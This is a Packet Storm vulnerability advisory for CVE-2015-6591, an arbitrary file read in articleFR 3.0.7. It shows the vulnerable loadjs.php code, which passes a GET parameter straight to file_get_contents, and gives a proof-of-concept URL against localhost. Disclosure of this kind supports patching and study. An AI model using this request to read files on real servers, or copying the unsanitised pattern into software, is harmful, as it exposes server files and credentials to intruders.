articleFR 3.0.7 Arbitrary File Read

2015-10-26T00:00:00
ID PACKETSTORM:134081
Type packetstorm
Reporter cfreer
Modified 2015-10-26T00:00:00

Description

                                        
                                            `# Exploit Title: articleFR any file read vulnerability in v3.0.7  
# Date: 2015-09-06  
# Vendor: Free Reprintables  
# Exploit Author: cfreer & 0keeTeam  
# Product web page: http://www.freereprintables.com  
# Version: 3.0.7  
# CVE : CVE-2015-6591  
  
  
Details of the vulnerability are as follows:  
  
Affected version: Version 3.0.7 and before.  
Discover date:2015/9/6  
Tested on: Apache/2.4.7 (Win32)  
===================================================  
  
The vulnerable parameter is ‘s’ ( in  
articleFR\application\templates\amelia\loadjs.php). Finally, Parameter ‘s’  
was directly into the function of file_get_contents.  
  
<?  
header('Content-Type: application/javascript');  
$_content = file_get_contents($_GET['s']);  
$_content = preg_replace('/(' . $_GET['h'] . ')/sim', $_GET['r'],  
$_content);  
print $_content;  
exit;  
?>  
  
  
  
Proof of Concept:  
=================================================================================================  
  
http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&r=0keeTeam&s=loadjs.php  
  
=================================================================================================  
  
  
referer: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591  
`